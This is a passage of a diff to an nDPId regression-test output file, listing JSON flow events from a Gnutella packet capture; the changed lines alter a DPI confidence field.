00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287652,"flow_last_seen":287652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.192.83.59","src_port":28681,"dst_port":33513,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287652,"flow_last_seen":287652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.192.83.59","src_port":28681,"dst_port":33513,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287499,"flow_last_seen":287499,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.199.103","src_port":28681,"dst_port":2625,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3399,7 +3399,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287625,"flow_last_seen":287625,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":6514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251799,"flow_last_seen":287319,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":47184,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251799,"flow_last_seen":287319,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":47184,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287340,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287340,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.36.106.134","src_port":28681,"dst_port":3927,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.36.106.134","src_port":28681,"dst_port":3927,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287526,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":6527,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3410,7 +3410,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287682,"flow_last_seen":287682,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.249.190.8","src_port":28681,"dst_port":25198,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287699,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.163","src_port":28681,"dst_port":6564,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287699,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.163","src_port":28681,"dst_port":6564,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287890,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287890,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":243618,"flow_last_seen":287524,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"121.7.145.36","src_port":28681,"dst_port":33905,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":243618,"flow_last_seen":287524,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"121.7.145.36","src_port":28681,"dst_port":33905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":52420,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3419,7 +3419,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":289962,"flow_last_seen":289962,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.163","src_port":28681,"dst_port":6599,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":28681,"dst_port":47329,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":28681,"dst_port":47329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":89829,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":89829,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287321,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"42.72.149.140","src_port":28681,"dst_port":37848,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287321,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"42.72.149.140","src_port":28681,"dst_port":37848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287510,"flow_last_seen":287583,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.20.248.147","src_port":28681,"dst_port":30706,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3440,7 +3440,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":28681,"dst_port":50679,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287444,"flow_last_seen":287781,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":28681,"dst_port":4814,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287444,"flow_last_seen":287781,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":28681,"dst_port":4814,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2838,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2838,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287652,"flow_last_seen":287652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":28681,"dst_port":8658,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287652,"flow_last_seen":287652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":28681,"dst_port":8658,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287649,"flow_last_seen":287958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"70.81.219.111","src_port":28681,"dst_port":19210,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3457,14 +3457,14 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287466,"flow_last_seen":287466,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":28681,"dst_port":59384,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287697,"flow_last_seen":287697,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":9070,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287697,"flow_last_seen":287697,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":9070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287634,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4009,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287634,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4009,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"159.196.95.223","src_port":28681,"dst_port":2003,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"159.196.95.223","src_port":28681,"dst_port":2003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287510,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.22.22.94","src_port":28681,"dst_port":34245,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287510,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.22.22.94","src_port":28681,"dst_port":34245,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 